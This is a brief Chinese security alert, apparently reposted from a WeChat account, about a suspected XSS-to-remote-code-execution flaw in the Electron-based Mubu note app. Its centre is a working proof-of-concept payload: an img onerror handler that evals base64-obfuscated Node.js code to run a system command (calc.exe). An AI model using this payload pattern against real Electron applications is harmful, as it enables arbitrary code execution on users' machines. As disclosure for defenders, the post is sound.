【紧急预警】幕布笔记疑似存在RCE

admin 2023年7月10日01:44:18评论144 views字数 444阅读1分28秒阅读模式

Electron 是一个开源的跨平台框架,用于构建基于Web技术(HTMLCSSJavaScript)的桌面应用程序。它由 GitHub 公司开发并维护,目前具有 108k star

由于 Electron 内置了 Chromium 内核,并且拥有直接执行Nodejs代码的能力,攻击者可借助 XSS 漏洞在服务器端远程执行任意代码

当应用程序使用 Electron 框架时,通过接收攻击者精心构造的 Payload 后可能会产生命令执行漏洞

漏洞payload

<img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewphbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsgCn0pOw==`,`base64`).toString())'>

【紧急预警】幕布笔记疑似存在RCE

【紧急预警】幕布笔记疑似存在RCE

原文始发于微信公众号(刨洞之眼):【紧急预警】幕布笔记疑似存在RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月10日01:44:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【紧急预警】幕布笔记疑似存在RCEhttp://cn-sec.com/archives/1863527.html

发表评论

匿名网友 填写信息